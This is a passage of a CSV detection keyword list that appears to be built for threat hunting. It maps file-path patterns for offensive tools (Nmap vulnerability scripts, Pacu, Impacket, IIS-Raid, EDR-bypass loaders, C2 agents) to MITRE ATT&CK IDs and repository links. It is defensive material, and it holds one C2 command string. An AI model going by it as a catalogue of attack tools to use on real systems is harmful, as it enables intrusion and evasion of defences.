TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-virustotal.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-vlcstreamer-ls.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-vmware-path-vuln.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-vuln-cve2006-3392.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-vuln-cve2009-3960.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-vuln-cve2010-0738.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-vuln-cve2010-2861.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-vuln-cve2011-3192.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-vuln-cve2011-3368.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-vuln-cve2012-1823.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-vuln-cve2013-0156.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-vuln-cve2013-6786.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-vuln-cve2013-7091.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-vuln-cve2014-2126.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-vuln-cve2014-2127.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-vuln-cve2014-2128.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-vuln-cve2014-2129.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-vuln-cve2014-3704.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-vuln-cve2014-8877.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-vuln-cve2015-1427.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-vuln-cve2015-1635.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-vuln-cve2017-1001000.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-vuln-cve2017-5638.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-vuln-cve2017-5689.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-vuln-cve2017-8917.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-vulners-regex.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/vulnersCom/nmap-vulners,1,1,N/A,N/A,10,3002,526,2022-12-16T11:22:30Z,2017-12-19T21:21:28Z -*/http-vuln-misfortune-cookie.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-vuln-wnr1000-creds.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-waf-detect.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-waf-fingerprint.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-webdav-scan.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-wordpress-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-wordpress-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-wordpress-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-xssed.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/huan.exe *,offensive_tool_keyword,Huan,Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.,T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620,TA0002 - TA0008 - ,N/A,N/A,Exploitation tools,https://github.com/frkngksl/Huan,1,0,N/A,N/A,6,518,103,2021-08-13T10:48:26Z,2021-05-21T08:55:02Z -*/HuanLoader/*,offensive_tool_keyword,Huan,Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.,T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620,TA0002 - TA0008 - ,N/A,N/A,Exploitation tools,https://github.com/frkngksl/Huan,1,1,N/A,N/A,6,518,103,2021-08-13T10:48:26Z,2021-05-21T08:55:02Z -*/HWSyscalls.cpp*,offensive_tool_keyword,NtRemoteLoad,Remote Shellcode Injector,T1055 - T1027 - T1218.010,TA0002 - TA0005 - TA0010,N/A,N/A,Exploitation tool,https://github.com/florylsk/NtRemoteLoad,1,1,N/A,10,2,173,35,2023-08-27T17:14:44Z,2023-08-27T16:52:31Z -*/hyperion.exe*,offensive_tool_keyword,hyperion,A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds),T1027.002 - T1059.001 - T1116,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://www.kali.org/tools/hyperion/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*/Hypnos.git*,offensive_tool_keyword,Hypnos,indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections,T1055.012 - T1136.001 - T1070.004 - T1055.001,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/CaptainNox/Hypnos,1,1,N/A,10,1,49,5,2023-08-22T20:17:31Z,2023-07-11T09:07:10Z -*/hypobrychium.git*,offensive_tool_keyword,hypobrychium,hypobrychium AV/EDR Bypass,T1562.001 - T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/foxlox/hypobrychium,1,1,N/A,8,1,72,21,2023-07-21T21:13:20Z,2023-07-18T09:55:07Z -*/iam__backdoor_users_password*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,1,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/iam__bruteforce_permissions/*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,1,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/iam__privesc_scan*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/iax2-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/iax2-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/icap-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/icebreaker.git*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,1,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*/icebreaker.py*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,1,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*/IDiagnosticProfileUAC*,offensive_tool_keyword,IDiagnosticProfileUAC,UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl,T1548.002 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/Wh04m1001/IDiagnosticProfileUAC,1,1,N/A,10,2,173,32,2022-07-02T20:31:47Z,2022-07-02T19:55:42Z -*/iec-identify.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ielocalserver.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/ieshell32.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/iis_controller.py*,offensive_tool_keyword,IIS-Raid,A native backdoor module for Microsoft IIS,T1505.003 - T1059.001 - T1071.001,TA0002 - TA0011,N/A,N/A,C2,https://github.com/0x09AL/IIS-Raid,1,1,N/A,10,10,510,127,2020-07-03T13:31:42Z,2020-02-17T16:28:10Z -*/IIS-Raid.git*,offensive_tool_keyword,IIS-Raid,A native backdoor module for Microsoft IIS,T1505.003 - T1059.001 - T1071.001,TA0002 - TA0011,N/A,N/A,C2,https://github.com/0x09AL/IIS-Raid,1,1,N/A,10,10,510,127,2020-07-03T13:31:42Z,2020-02-17T16:28:10Z -*/ike-crack.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*/IKEForce*,offensive_tool_keyword,IKEForce,IKEForce is a command line IPSEC VPN brute forcing tool for Linux that allows group name/ID enumeration and XAUTH brute forcing capabilities.,T1110 - T1201 - T1018,TA0001 - TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/SpiderLabs/ikeforce,1,0,N/A,N/A,3,226,73,2019-09-18T09:35:41Z,2014-09-12T01:11:00Z -*/ike-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/imap-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/imap-capabilities.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/imap-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/imfiver/CVE-2022-0847*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/imfiver/CVE-2022-0847,1,1,N/A,N/A,3,257,74,2023-02-02T02:17:30Z,2022-03-07T18:36:50Z -*/impacket.*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*/impacket/*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*/impersonate-rs*,offensive_tool_keyword,impersonate-rs,Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI,T1134 - T1003 - T1008 - T1071,TA0004 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/zblurx/impersonate-rs,1,1,N/A,N/A,1,77,4,2023-06-15T15:33:49Z,2023-01-30T17:11:14Z -*/imperun * *cmd.exe /c whoami*,offensive_tool_keyword,Nightmangle,ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/1N73LL1G3NC3x/Nightmangle,1,0,N/A,10,10,72,10,2023-09-26T19:21:31Z,2023-09-26T18:25:23Z -*/Imperva_gzip_WAF_Bypass*,offensive_tool_keyword,Imperva_gzip_WAF_Bypass,Imperva Cloud WAF was vulnerable to a bypass that allows attackers to evade WAF rules when sending malicious HTTP POST payloads. such as log4j exploits. SQL injection. command execution. directory traversal. XXE. etc.,T1190 - T1210 - T1506 - T1061 - T1071 - T1100 - T1220,TA0001 - TA0002 - TA0003 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/BishopFox/Imperva_gzip_WAF_Bypass,1,1,N/A,N/A,2,146,29,2022-01-07T17:39:29Z,2022-01-07T17:38:33Z -*/implant/callback*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*/implant/elevate/*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script 